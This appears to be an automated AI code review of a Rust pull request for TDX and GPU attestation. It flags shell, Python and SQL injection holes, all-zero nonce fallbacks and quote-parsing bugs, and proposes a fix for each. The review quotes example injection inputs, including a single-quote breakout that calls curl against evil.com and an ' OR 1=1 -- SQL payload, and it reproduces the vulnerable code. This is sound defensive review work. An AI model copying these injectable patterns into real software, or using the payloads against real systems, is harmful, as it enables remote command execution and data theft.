+                warn!("[TDX VM] Failed to install guest attestation tools: {}", e);
+                String::new()
+            }
+        };

Comment on lines +77 to +105
async fn get_evidence_python_sdk(nonce: &str) -> TeeResult<String> {
    let script = format!(
        r#"
import json
from nv_attestation_sdk import attestation
nonce = bytes.fromhex('{}')
evidence = attestation.get_evidence(nonce)
print(json.dumps(evidence))
"#,
        nonce
    );

    let output = Command::new("python3")
        .args(["-c", &script])
        .output()
        .await
        .map_err(|e| TeeError::GpuAttestation(format!("Failed to run Python SDK: {}", e)))?;

    if output.status.success() {
        let stdout = String::from_utf8_lossy(&output.stdout);
        Ok(stdout.trim().to_string())
    } else {
        let stderr = String::from_utf8_lossy(&output.stderr);
        Err(TeeError::GpuAttestation(format!(
            "Python SDK failed: {}",
            stderr
        )))
    }
}

⚠️ Potential issue | 🔴 Critical

Command injection via nonce interpolation into Python script.

The nonce parameter is interpolated directly into a Python script string (Line 82) via format!. If nonce contains characters like ', \n, or Python code fragments, it can break out of the string context and execute arbitrary Python code. Since this nonce originates from attestation flows, it should be hex-encoded, but there's no validation.

Proposed fix — validate nonce is hex before interpolation
     async fn get_evidence_python_sdk(nonce: &str) -> TeeResult<String> {
+        // Validate nonce is hex-only to prevent injection
+        if !nonce.chars().all(|c| c.is_ascii_hexdigit()) {
+            return Err(TeeError::GpuAttestation(
+                "Nonce must be a hex string".into(),
+            ));
+        }
+
         let script = format!(
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/gpu/nvtrust.rs` around lines 77 - 105, The
get_evidence_python_sdk function currently interpolates the nonce directly into
a Python script which allows command injection; validate and sanitize the nonce
before using it in the format! call: ensure the nonce string contains only hex
characters (0-9, a-f, A-F) and the expected length (or return a
TeeError::GpuAttestation on invalid input), and only then build the script
passed to Command::new("python3"); alternatively, avoid interpolation by passing
the nonce via stdin or as a safe argument to the Python process (but if keeping
the script string, enforce strict hex validation of the nonce variable first).

Comment on lines +206 to +208

let nonce = expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes());


⚠️ Potential issue | 🔴 Critical

Nonce fallback uses hex string's UTF-8 bytes instead of actual nonce bytes — likely verification mismatch.

When expected_nonce is None, the fallback attestation.nonce_hex.as_bytes() produces the UTF-8 encoding of the hex string (e.g., "deadbeef" → [0x64, 0x65, 0x61, 0x64, ...]), not the decoded nonce bytes ([0xde, 0xad, 0xbe, 0xef]). The TDX verifier likely expects the raw nonce bytes embedded in the quote's report data. This will cause nonce verification to fail when no explicit expected_nonce is provided.

Proposed fix
-        let nonce = expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes());
+        let decoded_nonce;
+        let nonce = match expected_nonce {
+            Some(n) => n,
+            None => {
+                decoded_nonce = hex::decode(&attestation.nonce_hex)
+                    .map_err(|e| TeeError::TdxQuoteVerification(format!("Invalid nonce hex: {}", e)))?;
+                &decoded_nonce
+            }
+        };
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/service.rs` around lines 206 - 208, the fallback `expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes())` uses the UTF-8 bytes of the hex string instead of the decoded nonce bytes. Decode `attestation.nonce_hex` from hex (e.g., via `hex::decode`) and use the resulting bytes as the fallback, returning a verification error on decode failure rather than silently using the UTF-8 bytes, and update downstream uses of `nonce` to expect the decoded bytes.

Comment on lines +93 to +116
pub async fn get_quote(&self, nonce: &str) -> TeeResult<Vec<u8>> {
// Get certificate hash if configured
let cert_hash = if self.server_cert_path.is_some() {
self.get_cert_hash().await.ok()
} else {
None
};

// Combine nonce and cert hash for report data
// TDX report data is 64 bytes (128 hex chars)
let report_data = if let Some(hash) = cert_hash {
// nonce (64 hex chars) + cert_hash (64 hex chars) = 128 hex chars
let mut data = format!("{}{}", nonce, hash);
data.truncate(128);
data
} else {
// Pad nonce to 128 hex chars
let mut data = nonce.to_string();
data.truncate(128);
while data.len() < 128 {
data.push('0');
}
data
};

⚠️ Potential issue | 🔴 Critical

Report data not padded to 128 hex chars when cert_hash is present but combined length is short.

When cert_hash is Some, the code concatenates nonce + hash and truncates to 128. However, if their combined length is already less than 128 (e.g., short nonce), no zero-padding is applied — unlike the else branch which pads. TDX report data must be exactly 64 bytes (128 hex chars). This will produce malformed report data when nonce is shorter than 64 hex chars.

Proposed fix
         let report_data = if let Some(hash) = cert_hash {
             // nonce (64 hex chars) + cert_hash (64 hex chars) = 128 hex chars
             let mut data = format!("{}{}", nonce, hash);
             data.truncate(128);
+            while data.len() < 128 {
+                data.push('0');
+            }
             data
         } else {
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/provider.rs` around lines 93 - 116, the `Some(cert_hash)` branch of `get_quote` builds `report_data` by concatenating nonce + hash and truncating, but never pads when the combined length is under 128, producing too-short report data. After concatenation, call `data.truncate(128)` and then pad with `'0'` while `data.len() < 128` (the same logic as the else branch) so the final `report_data` is exactly 128 hex chars (64 bytes).

Comment on lines +183 to +188
#[async_trait]
impl QuoteProvider for TdxQuoteProvider {
async fn generate_quote(&self, report_data: &[u8]) -> TeeResult<Vec<u8>> {
let report_data_hex = hex::encode(report_data);
self.get_quote(&report_data_hex).await
}

⚠️ Potential issue | 🔴 Critical

generate_quote hex-encodes raw report data then re-processes it as a nonce — semantic mismatch.

The QuoteProvider::generate_quote trait method accepts raw report_data bytes (presumably the full 64-byte report data blob). However, this implementation hex-encodes the input and passes it to get_quote, which then treats it as a nonce and potentially appends a cert hash and pads. If the caller passes 64 raw bytes, hex::encode produces 128 hex chars, which when concatenated with a cert hash would be 192 chars — the cert hash gets truncated away. This double-encoding/reinterpretation will produce incorrect report data.

Consider either: (a) having generate_quote bypass the nonce+cert_hash logic and pass hex-encoded report_data directly to the CLI, or (b) documenting that generate_quote should only receive the nonce portion, not full report data.
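A minimal sketch of option (a), keeping the two paths separate. The helper names (`nonce_report_data_hex`, `format_report_data_hex`) are illustrative, not the crate's actual API:

```rust
/// Nonce path: nonce (+ optional cert hash), truncated then zero-padded
/// to exactly 128 hex chars. Mirrors the review's padded get_quote logic.
fn nonce_report_data_hex(nonce_hex: &str, cert_hash_hex: Option<&str>) -> String {
    let mut data = match cert_hash_hex {
        Some(hash) => format!("{}{}", nonce_hex, hash),
        None => nonce_hex.to_string(),
    };
    data.truncate(128);
    while data.len() < 128 {
        data.push('0');
    }
    data
}

/// Direct path: a pre-formed 64-byte report-data blob is hex-encoded as-is,
/// with no cert hash appended and no padding heuristics.
fn format_report_data_hex(report_data: &[u8]) -> Result<String, String> {
    if report_data.len() != 64 {
        return Err(format!("report data must be 64 bytes, got {}", report_data.len()));
    }
    Ok(report_data.iter().map(|b| format!("{:02x}", b)).collect())
}

fn main() {
    // Short nonce is padded to the full 128 hex chars.
    assert_eq!(nonce_report_data_hex("deadbeef", None).len(), 128);
    // Full 64-byte blob hex-encodes to exactly 128 chars, never truncated.
    assert_eq!(format_report_data_hex(&[0u8; 64]).unwrap().len(), 128);
    // Wrong-length report data is rejected rather than silently padded.
    assert!(format_report_data_hex(&[1u8; 10]).is_err());
    println!("ok");
}
```

With this split, `generate_quote` would call only the direct path and never re-enter the nonce+cert-hash routine.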

🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/provider.rs` around lines 183 - 188, `TdxQuoteProvider::generate_quote` hex-encodes the full 64-byte `report_data` and hands it to `get_quote`, which treats it as a nonce and applies cert-hash/truncation logic. Either add an internal helper that sends the hex-encoded `report_data` directly to the CLI without the nonce+cert_hash logic, or give `get_quote` a flag or alternate path that bypasses the nonce+cert_hash/padding routine for pre-formed report data; update `generate_quote` to use that direct path and ensure length handling matches the CLI's expected input for full report blobs.

Comment on lines +26 to +39
pub struct QuoteHeader {
/// Version of the quote structure (must be 4)
pub version: u16,
/// Attestation key type (2 = ECDSA-256-with-P-256)
pub attestation_key_type: u16,
/// TEE type (0x81 = TDX)
pub tee_type: u32,
/// Reserved bytes
pub reserved: [u8; 2],
/// QE Vendor ID (16 bytes)
pub qe_vendor_id: [u8; 16],
/// User data from Quote request (20 bytes)
pub user_data: [u8; 20],
}

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain



🌐 Web query:

Intel TDX DCAP Quote Version 4 header specification byte offsets

💡 Result:

Intel TDX DCAP Quote v4 header is 48 bytes total, laid out as follows (integer fields little-endian). (docs.rs)

| Byte offset (dec/hex) | Size | Field |
| --- | --- | --- |
| 0 / 0x00 | 2 | version (u16) |
| 2 / 0x02 | 2 | attestation_key_type (u16) |
| 4 / 0x04 | 4 | tee_type (u32) |
| 8 / 0x08 | 2 | reserved1[2] |
| 10 / 0x0A | 2 | reserved2[2] |
| 12 / 0x0C | 16 | qe_vendor_id[16] |
| 28 / 0x1C | 20 | user_data[20] |

So the header occupies byte range [0..47], and the quote body starts at offset 48 (0x30). (docs.rs)



Header struct is missing the second reserved field, causing qe_vendor_id and user_data to be parsed from wrong offsets.

The Intel TDX DCAP specification defines the 48-byte header with two 2-byte reserved fields at offsets 8–11, followed by qe_vendor_id at 12–27 and user_data at 28–47. The current struct declares only one reserved: [u8; 2] field, then reads qe_vendor_id from offset 10–25 (2 bytes too early) and user_data from offset 26–45 (2 bytes too early). The missing reserved2 field causes the QE Vendor ID and User Data to be parsed from incorrect memory locations. Additionally, to_bytes() only writes 46 of 48 bytes, leaving offsets 46–47 as zeros—data loss on round-trip serialization.

Also, verify_nonce() (line 194) uses prefix matching: it compares only the first expected_nonce.len() bytes, ignoring trailing bytes of the 32-byte nonce field. This allows incomplete nonce validation.
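A minimal sketch of the corrected 48-byte header with both reserved fields and a lossless round-trip, following the offsets above (illustrative, not the crate's actual code):

```rust
use std::convert::TryInto;

#[derive(Debug, PartialEq)]
struct QuoteHeader {
    version: u16,
    attestation_key_type: u16,
    tee_type: u32,
    reserved1: [u8; 2],
    reserved2: [u8; 2],
    qe_vendor_id: [u8; 16],
    user_data: [u8; 20],
}

impl QuoteHeader {
    fn from_bytes(b: &[u8]) -> Option<Self> {
        if b.len() < 48 {
            return None;
        }
        Some(Self {
            version: u16::from_le_bytes([b[0], b[1]]),
            attestation_key_type: u16::from_le_bytes([b[2], b[3]]),
            tee_type: u32::from_le_bytes([b[4], b[5], b[6], b[7]]),
            reserved1: [b[8], b[9]],
            reserved2: [b[10], b[11]],                // field the current struct drops
            qe_vendor_id: b[12..28].try_into().ok()?, // offset 12, not 10
            user_data: b[28..48].try_into().ok()?,    // offset 28, not 26
        })
    }

    fn to_bytes(&self) -> [u8; 48] {
        let mut out = [0u8; 48];
        out[0..2].copy_from_slice(&self.version.to_le_bytes());
        out[2..4].copy_from_slice(&self.attestation_key_type.to_le_bytes());
        out[4..8].copy_from_slice(&self.tee_type.to_le_bytes());
        out[8..10].copy_from_slice(&self.reserved1);
        out[10..12].copy_from_slice(&self.reserved2);
        out[12..28].copy_from_slice(&self.qe_vendor_id);
        out[28..48].copy_from_slice(&self.user_data); // all 48 bytes written
        out
    }
}

fn main() {
    let mut raw = [0u8; 48];
    raw[0] = 4;     // version = 4
    raw[4] = 0x81;  // tee_type = TDX
    raw[12] = 0xaa; // first byte of qe_vendor_id
    raw[47] = 0xbb; // last byte of user_data
    let h = QuoteHeader::from_bytes(&raw).unwrap();
    assert_eq!(h.version, 4);
    assert_eq!(h.tee_type, 0x81);
    assert_eq!(h.qe_vendor_id[0], 0xaa);
    assert_eq!(h.user_data[19], 0xbb);
    assert_eq!(h.to_bytes(), raw); // lossless round-trip, no trailing zeros
    println!("ok");
}
```

The round-trip assertion is exactly what fails with the current 46-byte serialization.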

🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/quote.rs` around lines 26 - 39, `QuoteHeader` is missing the second 2-byte reserved field, which shifts `qe_vendor_id` and `user_data` by 2 bytes and causes `to_bytes()` to emit only 46 bytes. Add `reserved2: [u8; 2]` so the layout matches the 48-byte TDX header, update the parser and `to_bytes()` to read/write all 48 bytes with `qe_vendor_id` (16 bytes) and `user_data` (20 bytes) at the correct offsets, and fix `verify_nonce()` to perform a full 32-byte equality check against the expected nonce rather than a prefix compare.

Comment on lines +274 to +278
let cmd = format!(
"INTEL_API_KEY='{}' bash -c '{}'",
intel_api_key,
tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
);

⚠️ Potential issue | 🔴 Critical

Shell injection via unsanitized string interpolation into SSH commands.

intel_api_key is spliced directly into a single-quoted shell string. A value containing a single quote (e.g., key'; curl evil.com #) breaks out of the quoting and executes arbitrary commands on the remote host over SSH.

The same pattern recurs for vm_name in create_test_tdx_vm (lines 770-795), cleanup_test_vm (line 939-943), and the bash -c wrappers in test_guest_quote_generation / wait_for_vm.

At minimum, escape single quotes in every user-supplied value before interpolation (value.replace('\'', "'\\''")) or, better, pass values exclusively through environment variable assignment handled by the SSH transport if supported.

🔒 Proposed fix (configure_pccs example — apply the same pattern everywhere)
     pub async fn configure_pccs(
         &self,
         connection: &SshConnectionDetails,
         intel_api_key: &str,
     ) -> Result<bool> {
         info!("[TDX Host] Configuring PCCS service");

-        // Create command with environment variables
+        // Escape single quotes to prevent shell injection
+        let escaped_key = intel_api_key.replace('\'', "'\\''");
         let cmd = format!(
             "INTEL_API_KEY='{}' bash -c '{}'",
-            intel_api_key,
+            escaped_key,
             tdx_host::CONFIGURE_PCCS.replace('\n', "; ").trim()
         );
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs` around lines 274 - 278, the command assembly interpolates user-controlled values into single-quoted shell strings (`intel_api_key` here, and `vm_name` in `create_test_tdx_vm`, `cleanup_test_vm`, and the `bash -c` wrappers used by `test_guest_quote_generation`/`wait_for_vm`), allowing shell injection. Escape single quotes in every interpolated value (replace `'` with `'\''`) before building the command string or, preferably, stop embedding values in single-quoted shell lines and pass them via the SSH transport's environment-variable support, applying the chosen method consistently to all these call sites.

Comment on lines +770 to +774
let create_disk_cmd = format!(
"VM_NAME='{}' bash -c '{}'",
vm_name,
tdx_guest::CREATE_TDX_VM_DISK.replace('\n', "; ").trim()
);

⚠️ Potential issue | 🔴 Critical

The .replace('\n', "; ") pattern breaks shell scripts containing comments and heredocs.

All tdx_guest::* command constants (CREATE_TDX_VM_DISK, CREATE_CLOUD_INIT, LAUNCH_TDX_VM_QEMU, WAIT_FOR_TDX_VM, TEST_GUEST_QUOTE_GEN, CLEANUP_TDX_VM, FULL_TDX_GUEST_TEST) contain shell comments and heredocs. Replacing newlines with "; " will:

  • Cause comments to consume subsequent statements (e.g., # comment\nif ... becomes # comment; if ... where the if is now a comment)
  • Completely break heredoc syntax (e.g., << EOF\n...EOF becomes << EOF; ...; EOF, where EOF is no longer a valid terminator)

This silently corrupts script execution at lines 277, 773, 784, 795, 832, 867, 881, and 942. Pipe multiline scripts to bash via a quoted heredoc (e.g., bash -s <<'SCRIPT' ... SCRIPT) or write them to temporary files on the remote host.
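A hedged sketch of the heredoc approach (the `heredoc_command` helper and the `SCRIPT` delimiter are illustrative, not existing code):

```rust
/// Deliver a multi-line script body over stdin via a quoted heredoc
/// instead of joining lines with "; ".
fn heredoc_command(env_var: &str, value: &str, script: &str) -> String {
    // Escape single quotes so the value cannot break out of its quoting.
    let escaped = value.replace('\'', "'\\''");
    // The quoted delimiter ('SCRIPT') disables expansion inside the body,
    // so comments and nested heredocs in `script` survive verbatim.
    format!("{}='{}' bash -s <<'SCRIPT'\n{}\nSCRIPT", env_var, escaped, script)
}

fn main() {
    let script = "# create disk\nqemu-img create -f qcow2 \"$VM_NAME.qcow2\" 20G";
    let cmd = heredoc_command("VM_NAME", "test-vm", script);
    assert!(cmd.starts_with("VM_NAME='test-vm' bash -s <<'SCRIPT'"));
    assert!(cmd.contains("# create disk\n")); // comment keeps its own line
    assert!(cmd.ends_with("\nSCRIPT"));
    // An injection attempt stays inert inside the escaped single quotes.
    let evil = heredoc_command("VM_NAME", "x'; rm -rf / #", "true");
    assert!(evil.contains("x'\\''; rm -rf / #"));
    println!("ok");
}
```

Because newlines are preserved end to end, the `tdx_guest::*` constants could be passed through unchanged.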

🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs` around lines 770 - 774, the code joins multi-line scripts with `.replace('\n', "; ")`, which corrupts shell comments and heredocs. For `create_disk_cmd` and every other use of this pattern (`CREATE_TDX_VM_DISK`, `CREATE_CLOUD_INIT`, `LAUNCH_TDX_VM_QEMU`, `WAIT_FOR_TDX_VM`, `TEST_GUEST_QUOTE_GEN`, `CLEANUP_TDX_VM`, `FULL_TDX_GUEST_TEST`), pass the script to bash as a heredoc or write it to a temporary file on the remote host and execute it, feeding the constant's contents verbatim without replacing newlines.

Comment on lines +744 to +751
// Read the quote file content (binary)
let quote_bytes = tokio::fs::read(quote_output)
.await
.or_else(|_| {
// If it's not a file path, try to decode as hex
hex::decode(quote_output)
})
.context("Failed to read/decode TDX quote")?;

⚠️ Potential issue | 🔴 Critical

tokio::fs::read(quote_output) always fails — it tries to read SSH stdout as a local file path.

The SSH command runs cat "$TMPFILE" which writes quote contents to stdout. quote_output is the quote data (or hex), not a local file path. tokio::fs::read(quote_output) will attempt to open a local file named with the quote content — guaranteed to fail. The fallback hex::decode is always used. Remove the dead tokio::fs::read path.

Proposed fix
-        // Read the quote file content (binary)
-        let quote_bytes = tokio::fs::read(quote_output)
-            .await
-            .or_else(|_| {
-                // If it's not a file path, try to decode as hex
-                hex::decode(quote_output)
-            })
-            .context("Failed to read/decode TDX quote")?;
+        // The SSH command returns hex-encoded quote data via stdout
+        let quote_bytes = hex::decode(quote_output)
+            .context("Failed to decode TDX quote hex from remote output")?;
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tee.rs` around lines 744 - 751, `quote_output` is SSH stdout (the quote data itself), so `tokio::fs::read(quote_output)` always fails by trying to open a local file named after the quote contents. Remove the `tokio::fs::read` path and decode the data directly, e.g. `let quote_bytes = hex::decode(quote_output).context("Failed to decode TDX quote")?;`, updating the error context accordingly.

Comment on lines +938 to +942
// Generate random nonces
let mut tdx_nonce = [0u8; 64];
getrandom::getrandom(&mut tdx_nonce).unwrap_or_default();
let mut gpu_nonce = [0u8; 32];
getrandom::getrandom(&mut gpu_nonce).unwrap_or_default();

⚠️ Potential issue | 🔴 Critical

getrandom failure silently produces all-zero nonces — defeats attestation freshness.

unwrap_or_default() fills the nonce buffer with zeros if getrandom fails. All-zero nonces are predictable and defeat replay protection entirely. This should be a hard error.

Proposed fix
         let mut tdx_nonce = [0u8; 64];
-        getrandom::getrandom(&mut tdx_nonce).unwrap_or_default();
+        getrandom::getrandom(&mut tdx_nonce)
+            .map_err(|e| anyhow::anyhow!("Failed to generate random TDX nonce: {}", e))?;
         let mut gpu_nonce = [0u8; 32];
-        getrandom::getrandom(&mut gpu_nonce).unwrap_or_default();
+        getrandom::getrandom(&mut gpu_nonce)
+            .map_err(|e| anyhow::anyhow!("Failed to generate random GPU nonce: {}", e))?;
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/miner_prover/validation_tee.rs` around lines 938 - 942, the `getrandom` calls use `unwrap_or_default()`, silently producing all-zero nonces on failure. Treat failure as a hard error: check the `Result` from both `getrandom` invocations that populate `tdx_nonce` and `gpu_nonce`, and return or propagate an error (or `expect` with a clear message) instead of filling the buffers with zeros.

Comment on lines +238 to +260
/// Get count of nodes matching TEE requirements
pub async fn count_nodes_matching_tee_requirements(
&self,
require_tdx: bool,
require_gpu_cc: bool,
expected_mrtd_hex: Option<&str>,
) -> Result<u64, anyhow::Error> {
let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");

if require_tdx {
query.push_str(" AND tdx_verified = 1");
}
if require_gpu_cc {
query.push_str(" AND gpu_cc_enabled = 1");
}
if let Some(mrtd) = expected_mrtd_hex {
query.push_str(&format!(" AND tdx_mrtd_hex = '{}'", mrtd));
}

let row = sqlx::query(&query).fetch_one(&self.pool).await?;

Ok(row.get::<i64, _>("count") as u64)
}

⚠️ Potential issue | 🔴 Critical

SQL injection vulnerability via string interpolation of mrtd value.

Line 254 directly interpolates user-supplied expected_mrtd_hex into the SQL string with format!(" AND tdx_mrtd_hex = '{}'", mrtd). This is a classic SQL injection vector — a crafted mrtd value like ' OR 1=1 -- can bypass filters or leak data.

Use parameterized binding instead:

Proposed fix
     pub async fn count_nodes_matching_tee_requirements(
         &self,
         require_tdx: bool,
         require_gpu_cc: bool,
         expected_mrtd_hex: Option<&str>,
     ) -> Result<u64, anyhow::Error> {
-        let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
+        let mut query = String::from("SELECT COUNT(*) as count FROM node_tee_status WHERE 1=1");
+        let mut bindings: Vec<String> = Vec::new();
 
         if require_tdx {
             query.push_str(" AND tdx_verified = 1");
         }
         if require_gpu_cc {
             query.push_str(" AND gpu_cc_enabled = 1");
         }
-        if let Some(mrtd) = expected_mrtd_hex {
-            query.push_str(&format!(" AND tdx_mrtd_hex = '{}'", mrtd));
+        if let Some(mrtd) = expected_mrtd_hex {
+            query.push_str(" AND tdx_mrtd_hex = ?");
+            bindings.push(mrtd.to_string());
         }
 
-        let row = sqlx::query(&query).fetch_one(&self.pool).await?;
+        let mut q = sqlx::query(&query);
+        for b in &bindings {
+            q = q.bind(b);
+        }
+        let row = q.fetch_one(&self.pool).await?;
 
         Ok(row.get::<i64, _>("count") as u64)
     }
🤖 Prompt for AI Agents
In `@crates/basilica-validator/src/persistence/tee_profile.rs` around lines 238 - 260, `count_nodes_matching_tee_requirements` builds SQL by interpolating `expected_mrtd_hex` directly, enabling SQL injection. Append a parameter placeholder (`" AND tdx_mrtd_hex = ?"`) when `expected_mrtd_hex` is `Some(...)` and pass the value via sqlx binding: use `sqlx::query` (or `query_scalar`) with `.bind(mrtd)` before `fetch_one`, so the filter is applied without string concatenation.
